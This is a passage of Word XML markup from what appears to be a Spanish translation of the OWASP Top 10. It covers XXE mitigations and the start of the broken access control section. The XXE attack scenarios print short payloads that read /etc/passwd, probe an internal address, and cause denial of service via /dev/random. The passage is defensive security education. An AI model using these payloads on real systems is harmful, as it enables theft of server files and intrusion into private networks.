              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Deshabilite las entidades externas de XML y procesamiento DTD en todos los analizadores sintácticos XML en su aplicación.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Implemente validación de entrada positiva en el servidor (“lista blanca”), filtrado y sanitización para prevenir el ingreso de datos dañinos dentro de documentos, cabeceras y nodos XML. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Verifique que la funcionalidad de carga de archivos XML o XSL valide el XML entrante, usando validación XSD o similar. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Las herramientas SAST pueden ayudar a detectar XXE en el código fuente, aunque la revisión manual de código es la mejor alternativa en aplicaciones grandes y complejas. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Si estos controles no son posibles, considere usar parcheo virtual, </w:t>
            </w:r>
            <w:r w:rsidR="00646906" w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Gateways</w:t>
            </w:r>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> de seguridad de API, o Firewalls de Aplicaciones Web (WAFs) para detectar, monitorear y bloquear ataques XXE.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912EEA" w:rsidRPr="006B7D3B" w:rsidTr="00296F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0" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Ejemplos de escenarios de ataque</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00646906" w:rsidRDefault="00912EEA" w:rsidP="00646906">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00646906">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Han sido publicados numerosos XXE, incluyendo ataques a dispositivos embebidos. Los XXE ocurren en una gran cantidad de lugares inesperados, incluyendo dependencias profundamente anidadas. La manera más fácil es cargar un archivo XML malicioso, si es aceptado.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Escenario #1: </w:t>
            </w:r>
            <w:r w:rsidRPr="00646906">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>El atacante intenta extraer datos del servidor.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="70AD47"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="70AD47"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>&lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="70AD47"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="70AD47"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;!DOCTYPE foo [ </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="70AD47"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="70AD47"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>&lt;!ELEMENT foo ANY&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="FF0000"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="FF0000"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;]&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="70AD47"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="70AD47"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="70AD47"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>&lt;foo&gt;&amp;xxe;&lt;/foo&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Escenario #2: </w:t>
            </w:r>
            <w:r w:rsidRPr="00646906">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Cambiando la línea ENTITY anterior, un atacante puede escanear la red privada del servidor:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="FF0000"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="FF0000"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>&lt;!ENTITY xxe SYSTEM "https://192.168.1.1/private"&gt;]&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00646906">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Escenario #3: </w:t>
            </w:r>
            <w:r w:rsidRPr="00646906">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Incluyendo un archivo potencialmente infinito, se intenta un ataque de denegación de servicio:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="FF0000"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>&lt;!ENTITY xxe SYSTEM "file:///dev/random"&gt;]&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidTr="00296F9B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="12180" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w:rsidR="002B21E7" w:rsidRPr="00064150" w:rsidRDefault="002B21E7" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251695104" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5D723B1A" wp14:editId="02522FF0">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>-64902</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>288</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="1276528" cy="819264"/>
                  <wp:effectExtent l="0" t="0" r="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448952.tmp"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId82">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1276528" cy="819264"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                  <wp14:sizeRelH relativeFrom="page">
                    <wp14:pctWidth>0</wp14:pctWidth>
                  </wp14:sizeRelH>
                  <wp14:sizeRelV relativeFrom="page">
                    <wp14:pctHeight>0</wp14:pctHeight>
                  </wp14:sizeRelV>
                </wp:anchor>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Pérdida de Control de Acceso</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidTr="00296F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0" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="002B21E7" w:rsidRDefault="00912EEA" w:rsidP="002B21E7">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002B21E7">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Las restricciones sobre lo que los usuarios autenticados pueden hacer no se aplican correctamente. Los atacantes pueden explotar estos defectos para acceder, de forma no autorizada, a funcionalidades y/o datos, cuentas de otros usuarios, ver archivos sensibles, modificar datos, cambiar derechos de acceso y permisos, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidTr="00296F9B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="12180" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRDefault="003F1152" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251708416" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>-69297</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>-83185</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="8241030" cy="819150"/>
                  <wp:effectExtent l="0" t="0" r="7620" b="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B0D40E.tmp"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId83">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="8241030" cy="819150"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                  <wp14:sizeRelH relativeFrom="page">
                    <wp14:pctWidth>0</wp14:pctWidth>
                  </wp14:sizeRelH>
                  <wp14:sizeRelV relativeFrom="page">
                    <wp14:pctHeight>0</wp14:pctHeight>
                  </wp14:sizeRelV>
                </wp:anchor>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w:rsidR="003F1152" w:rsidRPr="00912EEA" w:rsidRDefault="003F1152" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00167841" w:rsidRPr="00912EEA" w:rsidTr="00296F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rsidR="00912EEA" w:rsidRPr="003F1152" w:rsidRDefault="00912EEA" w:rsidP="003F1152">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003F1152">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">La explotación del control de acceso es una habilidad esencial de los atacantes. Las herramientas SAST y DAST pueden detectar la ausencia de controles de acceso, pero, en el caso de estar presentes, no pueden verificar si son correctos. Es detectable utilizando medios </w:t>
            </w:r>
            <w:r w:rsidRPr="003F1152">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>manuales o de forma automática en algunos frameworks que carecen de controles de acceso.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4961" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="003F1152">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Las debilidades del control  de acceso son comunes debido a la falta de detección automática y a la falta de pruebas funcionales efectivas por parte de los desarrolladores de aplicaciones. </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3680" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="003F1152">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">El impacto técnico incluye atacantes anónimos actuando como usuarios o administradores; usuarios que utilizan funciones privilegiadas o crean, acceden, actualizan o eliminan cualquier registro. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidTr="00296F9B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="6091" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>¿La aplicación es vulnerable?</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00171B63" w:rsidRDefault="00912EEA" w:rsidP="00171B63">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00171B63">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Las restricciones de control de acceso implican que los usuarios no pueden actuar fuera de los permisos previstos. Típicamente, las fallas conducen a la divulgación, modificación o destrucción de información no autorizada de los datos, o a realizar una función de negocio fuera de los límites del usuario. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00171B63" w:rsidRDefault="00912EEA" w:rsidP="00171B63">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00171B63">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Las vulnerabilidades comunes de control de acceso incluyen:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00171B63" w:rsidRDefault="00912EEA" w:rsidP="00171B63">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00171B63">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Pasar por alto las comprobaciones de control de acceso modificando la URL, el estado interno de la aplicación o HTML, utilizando una herramienta de a</w:t>
            </w:r>
            <w:r w:rsidR="00171B63">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">taque o una conexión vía API. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00171B63" w:rsidRDefault="00912EEA" w:rsidP="00171B63">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00171B63">
              <w:rPr>
